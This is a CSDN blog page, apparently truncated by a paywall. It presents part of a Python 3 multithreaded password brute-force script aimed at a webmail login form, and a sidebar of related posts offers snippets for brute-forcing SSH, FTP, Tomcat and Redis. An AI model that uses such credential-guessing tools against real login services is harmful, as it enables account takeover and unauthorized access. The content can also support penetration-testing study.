python爆破脚本_多线程爆破脚本(python3)

最新推荐文章于 2022-09-22 20:11:49 发布
最新推荐文章于 2022-09-22 20:11:49 发布
阅读量1.2k 收藏
点赞数
文章标签: python爆破脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39598941/article/details/111429886
版权
这是一个使用Python3编写的多线程爆破脚本,通过自定义的BruteParser类解析网页隐藏表单字段,利用requests库进行HTTP请求。脚本支持命令行参数,可以指定用户名、密码文件,输出结果到文件,并通过Burp Suite代理进行网络请求。在爆破过程中,遇到验证码错误会抛出自定义异常。
摘要由CSDN通过智能技术生成

#!/usr/bin/env python3

# -*- coding: utf-8 -*-

import logging

import argparse

import queue

import requests

import threading

import os

import time

import random

from html.parser import HTMLParser

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# disable InsecureRequestWarning

# 由于目标站点使用的证书过期了,导致我在使用requests库请求时将verify设置为FALSE,同时配置了proxies(指向本地Burp)。而requests依赖的底层库urllib3总是报Warning,所以使用上面语句disable掉这个Warning。可以参考如下链接:

# https://stackoverflow.com/questions/27981545/suppress-insecurerequestwarning-unverified-https-request-is-being-made-in-pytho

logging.basicConfig(level=logging.WARNING) # 用logging,避免调试时满篇的print.(但本脚本中基本没怎么用。。。)

# general settings

target_url="https://mail.xxx.com/UserLogin.aspx"

writeFileLock = threading.Lock() # 创建文件锁,避免写文件冲突。

threadLock = threading.Lock() #创建线程锁,避免对显示效果的影响。

# 保存爆破结果

def saveFile(message,outfilePath):

with open(outfilePath, 'a+', encoding = 'utf8') as f: # 以追加的方法结果写入文件

f.write(message[0]+"\t")

f.write(message[1]+"\n")

# 自定义一个Exception类,用于显示自定义的异常。

class validcodeException(BaseException):

def __init__(self,mesg=" @@@@@@@@@@@@@@@ valid code is wrong!!!!!!!"):

print(mesg)

# 解析响应报文,主要用户提取服务器响应回来的表单字段,顶

最低0.47元/天 解锁文章
weixin_39598941
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python写一个爆破网站管理员密码脚本
柠檬i的博客
11-05 5766
python脚本用requests库的post方法发送http post数据包,通过读取字典文件的方式来进行密码猜解,为了程序美观还加入了程序logo和彩色显示。
Python爆破8-多线程同时爆破
m0_61786761的博客
09-21 421
提示:当用户名较多时,注意限制调用线程的数量。
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
python 3:多线程
sunshine_lyn的博客
07-30 672
以下两篇文章写得比较详细,可作为参考。 - https://www.cnblogs.com/jokerbj/p/7460260.html - http://www.dabeaz.com/python/UnderstandingGIL.pdf 下面出现的案例代码请看下一篇博文。 多线程 vs 多进程 程序:一堆代码以文本形式存入一个文档 进程: 程序运行的一个状态 包含地址空间,内存,...
python3 多线程爆破ftp、mysql、ssh
weixin_30480583的博客
08-12 419
当然 也支持ip 为 127.0.0.1-255 这样的 字典放到 dict 目录里 链接: https://pan.baidu.com/s/1htchOyN5hK9nmZlWfTiFzA 密码: vgsh 转载于:https://www.cnblogs.com/smxiazi/p/9461848.html...
Python 开发-多线程爆破
xhscxj的博客
06-05 678
1.ftplib 模块使用 2.遍历用户及密码字典 3.尝试连接执行命令判断 异或一句话免杀php
Python脚本9-多线程分任务爆破
m0_61786761的博客
09-22 444
一个进程的线程数量有限,如何能够提升并发能力?将任务分配给多个不同的电脑, 或在一台电脑上运行多个程序。
md5碰撞爆破python3脚本
01-16
md5碰撞爆破python3脚本
python制作企业邮箱的爆破脚本
12-23
Python制作企业邮箱爆破脚本涉及的关键知识点包括Python编程、POP3协议、网络通信和安全性。以下是这些知识点的详细说明: 1. Python编程: - `sys.argv`:这是一个列表,用于获取命令行参数。在Python脚本中,`...
邮箱爆破脚本。代码
11-29
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
Python3 实现网站后台弱口令爆破多线程
Z_LiT0的博客
12-01 5370
首先,你得有一个好的密码字典。 程序仅用于学习和交流,如果有更好的功能或不足请告知我! 运行程序前需要burpsuite 或者其他代理拦截,得到post以及爆破实际网址才能继续进行。
Python安全开发——多线程Fuzz&Waf 异或免杀&爆破
qi_SJQ_的博客
02-23 1439
1.概述: 知识点: 协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术 目的: 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等 2.简单多线程技术、FTP 模块实现协议爆破脚本: queue,threading 模块使用、ftplib 模块使用:遍历用户及密码字典、尝试连接执行命令判断 ftp模块使用:https://www.cnblogs.com/xiao-apple36/p/9675185.html https://
python之——使用python编写爆破脚本
wsnbbz的博客
04-15 3060
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhos...
python ssh 爆破_python多线程ssh爆破
weixin_39790102的博客
12-15 189
Python0x01.About爆弱口令时候写的一个python脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入。主要使用到的是python的paramiko模块和多线程threading模块。那么,首先要准备的是字典dict、服务器ip表。东西很简单,主要默认目录如下:|--ssh.scan.py|--/log:sshd|--/dict:ippasswordip和pa...
Python 渗透测试:文件传输爆破( 21端口 )
网络安全领域___专研者.
05-21 3009
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
python——ssh多线程爆破脚本
地址ch3nye.top
02-09 2626
今天花了一下午写了个爆破ssh的多线程脚本,debug到新闻联播,队大佬来说是个辣鸡脚本,我在这记录一下,如有需要可以拿去用。 可以直接clone我的github:https://github.com/1344098010/BruteForceSSH 说明 环境python3.7 windows和linux均可运行  爆破程序入口 start.py  PS F:\SSHBF&g...
python多线程ssh爆破
angaoux03775的博客
02-23 254
本周需要给客户做渗透测试,扫描器中发现客户存在SSH弱口令,于是在网上找个一个SSH爆破脚本,顺便改了一下,测试,虽然没成功~ 程序目录如下: |--ssh.scan.py |--/log: sshd |--/dict: ip password下面上源码吧,文件保存为ssh.scan.py,查看使用方式:python ssh.scan.py -h ...
python爆破redis
最新发布
09-07
要进行Python爆破Redis,可以使用第三方库redis和一些基本的爆破原理。首先需要安装redis库,可以使用命令`pip install redis`进行安装。然后,可以使用以下代码进行爆破操作: ```python import redis with open(r'C:\Users\hot\Desktop\密码库.txt', "rb") as passfile: while True: line = passfile.readline() if not line: break linelist = line.decode("utf-8", "ignore").split(" ") password = linelist<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值